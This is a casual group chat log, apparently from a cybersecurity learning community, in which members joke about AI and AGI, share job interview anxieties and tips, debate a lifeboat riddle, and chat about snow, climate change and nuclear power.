Oh I am familiar with that but lol, I couldnāt be bothered to read the paragraph tbh
Fair.
i liked ai discussion
Net positive or net negative
you sure the higher ups wont just leave 99% of the popyulation to die when they get AGI?
no need for a work force when AI can do everything
AI will hopefully advance scientific studies, and either allow me to visit the moon or buy a flying car
thats called a helicopter
This argument goes back to the 1920s and ealier with automation, no we need staff to oversee the machines
They won't. Higher ups are stupid people with power. They need normal people like us to figure out stuff.
A helicopter to the moon? Or a flying helicopter car?
not with an AGI, it would be able to figure out everything
a flying car is a helicopter
what
Gishhhhhhgallop š
How would these stupid people control AGI that would be several times smarter than humans?
lol we are nowhere near that point
They do not even know what VPN is
I have some experience with AW159ās and itās not as fun as the idea of driving the delorean time machine
technically neither does AI, it can just regertigate info
AI doesnāt even know how to multiply
itās just trying to give us results it āthinksā look correct
yet
how would anyone at this point
Well we shall see but that would require something beyond a LLM
but combine Worm with AI and you have self multiplying AI š
yipee
I remember in an interview I couldnāt explain the technical explanation of a VPN, despite knowing exactly what it is, having set them up, and using them all the time lol⦠proof that nerves can affect how you think
LLMs canāt do math because they were never designed to do so
Just hope that doesnāt happen in my interview next week
honestly same
just say tunnel a bunch of times and call it a day 
That's me on every single interview for job. I know this stuff normally and when working even in stress too. But when I am at interview my brain forgets everything š¦
Iām glad you all agree with me lol, fucking hate interviews
Get the shakes sometimes too
But yep I maintain IPSec and SSL VPN stuff at work, and more for personal. I do think Iād be able to answer these questions on the spot as Iāve had to with third parties before
the only thing worse than working is getting a job
I do understand the anxiety though
I think itās the questions you werenāt expecting to be asked that get you⦠you spend so much time preparing on the questions you want to get asked
what about those weird as fuck questions they sometimes ask
Then you just be honest and answered informed guesses baed on the knowledge you already have, whilst stating as such
I hate current job market. Jobs are scarce, only for seniors. Requirements are insane, salaries are meh, remote work almost dead, companies fire people (me included).
WhAts yOur bIggEst wEakNess
you know your character well enough š¤·āāļø
Iām too dedicated to my work, and it seeps into my thoughts in my personal life 
only half true lol
I don't mind interviews.
For me thatās pretty spot on
i interview surprisingly well
Had enough of them with THM.
Hearing this question
just gotta make em laugh a bit, bring down the formality a little level
That's how I finally met Ashu š
Mhmm some soft skills can work wonders taking the tension down
ive heard some companies are doing pre recorded interviews
I have to give a 5 minute presentation on why they should hire me
those must be hell
I changed my mind. My biggest weakness is lack of humor
bless you
thats dumb
Make a couple inappropriate jokes right off that bat so the only way it can go is up ā¬ļø
good luck
Yeah when you said presentation, I thoguht surely you donāt mean⦠[what you literally just stated]
Sadly, the timing was wrong and I had to turn down the job offer from TryHackMe.
THEY should give a five minute presentation on why they YOU should work for them
This is easy
Yep and I donāt even have SIEM experience š so I created a PowerPoint presentation with a slide that just reads āSkills can be taught. Being a proactive thinker and positive mindset is something you either are or arenātā
smart
Obviously thereās more slides
To be fair even if itās a pain, you can get SIEM experience at home, not to mention literal rooms for such on THM
Iād like to think they didnāt invite me for the fun of it knowing I donāt have that exp
nah itās moved into job stuff
I had a full exam on Logrythm last year.
nah we talking interviews
I was going to install Wazuh this weekend but Iāve had a sickness bug lol, that boat has kinda sailed now
That being said, I should disengage so I donāt spend all day here. Been a fun three hours tho lol!
I really hate coding parts of interview. My mind always goes empty on interview and the time they give is never enough. Few days ago I had 20 minutes to write a script in python. 20 minutes ended and they said to me that it looks like I wont make it as interview ends in 4 minutes and we finished it. After the interview I did finish that code in 2 minutes. Of course they did reply to me that they need someone more experineced. I feel like crap to this day š¦
5 minutes of talking about yourself and having 4 others maintain eye contact the entire time I donāt personally consider to be easy
Speak slowly during interviews, gets you higher chances of sticking in the interviewer's mind
I usually mimic the speed of the interviewer, creates a sense of similarity and trust š
not too slow
Oh god, creepy if over done
That wasnāt a joke
Mirroring is creepy
If done intentionally
eye contact the whole time?
why?
sorry can't talk rn watching ben 10!!
No eyelids
imho maintaining your own personality and vibe is critical in an interview, donāt be disengenuine
ahh
do you answer the "where do you see yourself in 5 years" question honestly? i always thought that question is a bit too private, like why would i tell you my life plans
nope i dont
Changing the pace of your presentation doesnāt necessarily mean speak at the exact pace as the interviewer lol
I couldn't answer that honestly, I don't know where I'm headed
But they may be overwhelmed if youāre talking at 100 words per minute
Become the interviewer, mimick the way they talk and look around the room, how they sit, the way they are talking, can't stop there
āMimic the interviewerā your words cowboy
This is what Iām imagining
no
nah not at all
and whats the right answer to this question anyway? "ill pledge my whole life to your company"
Become them
or like a primal challenge for āwho blinks firstā lol
Yeah, if theyāre pushing through questions, give them a speedy response, etc. my words are open to interpretation š
Iām talking about them
me if my team ever makes me turn my camera on
Start asking them questions
"So... John. Where do you see yourself in 5 years?
Are you confident in that answer?"
@wind lake I think you have misunderstood lol
Work from home vibes be like, nope I donāt have a webcam, never showing my face. Win
Alright time for finish my replay of Final Fantasy IX. Iāll be around, but Iām on Disc 4 eager to finish
You can keep your webcam off if youāre having technical issues or your network doesnāt support it.
Me: funny you should say actuallyā¦
ave fun
The plot was thickening but my imagination ran dry
William Shakespeare 1564-1616
āYou are a captain of a ship, itās sinking. There are 21 crew members and only 20 spots on the life raft, what do you do?ā
I leave no bodies behind
Wrong
Are there children and women?
Unless you have 20 bullets?
I need 1 raft
You convince your crew the boat is salvageable but only with their help. Once on the ship. You take the life raft and sail into the sunset
I'm very tool efficient
Maybe it is salvageable?
Already eaten from being lost at sea for the last 3 months
you house the 20 crew on the raft (already an unsustainable number for a raft) and swim along holding onto the back keel of the raft
They can't leave, they know who did it
Youāre bringing me memories of the time I was in the DRU
you become the engine
lol indeed
English
I would answet that everyone enters the raft including me. Rafts are designed to sustain bigger mass and capacity by design in the first place so I would just squeeze there.
thereās never been a raft that holds 20 tho so, itās presumably already above capacity
Wrong
Life rafts are pretty robust these days
thatās already against regulations
To be fair, in what world would you be given an elephant that you are not allowed to sell or abandon and, if so, what would you do with it?
The RN survival raft I think holds up to 30
You'd stick it into the refrigerator of course
This doesnāt bring up a good result
Eat it and build and ace ventura spy animal suit from its skin
For osint
Shrimp
Say it to people on titanic š
No even then they had far more than one raft, they just didnāt have enough
which lead to our current international regulations
yes well thankfully we're no longer in 1912
You have to convince them there is only one
Today itās international regulations that your boat carry more life rafts than required to safely evacuate everyone, with a couple to spare
fun fact. Scientists did analyze the titanic story and apparently the dude could survive if he also did get on with the girl on that piece of wood or whatever it was. They calculated it would fit them both and not sink.
Majority of people wouldnāt survive in the sea anyway, due to not being able to control their body in the water
Good luck both climbing on
Oh it was a 24 man life raft
Iceberg is there cus of global warming
I know you say that for the lols but wow thatās so dumb Iām having a hard time even thinking of a good response even in jest
Not as relaxing when it comes time to shovel/plow
Can you ship me the snow
SHUT UP
lol we have more than enough here, come take some from Michigan
snow's only a vibe for a first couple of hours/ a day
Let me enjoy the moment
Preferably in cloud form
It ain't reaching 15 cm
first half hour its fun
....
next 5 hours is scary
be honest, you have never seen a meter of snow in your life
bro is from siberia
Yep, I doubt I have seen 40cm for snow
Serbia would do, but Michigan used to get that same kind of snow back in the early 1900s and sure doesnāt anymore
I have! Iāve seen 2
Lake effect on the west coast does
Heck itās changed even since I was a kid, we used to get tons, now weāre lucky if it snows before Janurary
I mean do you want more snow
Lucky?
no but itās also a bad sign
As in more per snowfall, not more snowfalls
Times a changin
lets all be honest, snow was fun when we were kids and had no responsibilities
so no itās not an improvement when it spells our global impending doom in very visible form
Snow is still fun
dunno, im not having fun in 7 am shoveling it from my car lmao
Both have dramatically decreased since the 90s, itās been wild
Quality is a lil better
Put a towel on your windshield the night before
Oh you mean contamination? Sure but thatās on track to get worse too lol
Less of this
šØš¦ The snow is over my head ^^; Anyone got a snorkel?
Not sure if youāre been reading the news but no weāre trending to more of that
Where are my nuclear power plants!
Alabama and Georgia I believe. Also N.C.
And I've got two up here near me in Canada.
Project is being built in Wyoming too
but no nuclear power and clean energy is scary and woke. We need to agressively pump CO2 into the amosphere to combat the woke
Don't you know, Carbon's good for the atmosphere, you need to put carbon in the atomsphere to feed the plants!
This just took a turn š šæ
Itās just depressing when we did actually work to fix the hole in the Ozone layer internationally but nah politics prevent us from fixing our current woes
i thought that global warming is a fad
What is happening to the US rn
like 2010 fad
To be fair a lot of places have the opposite fear of Nuclear. There's a very big push by existing powers to prevent nuclear from becoming the primary source of energy in the world. Probably the most egregious example is Germany.
climate change is a fact we already see in motion
@copper stone yo whats up
Well each country has their own reasons why they either pushed Nuclear away or adopted it wholeheartely like France
Nuclear is orders of magnitude more safe and sustainable
China is pretty big
Yeah but that doesn't stop crazy propaganda from being told about it.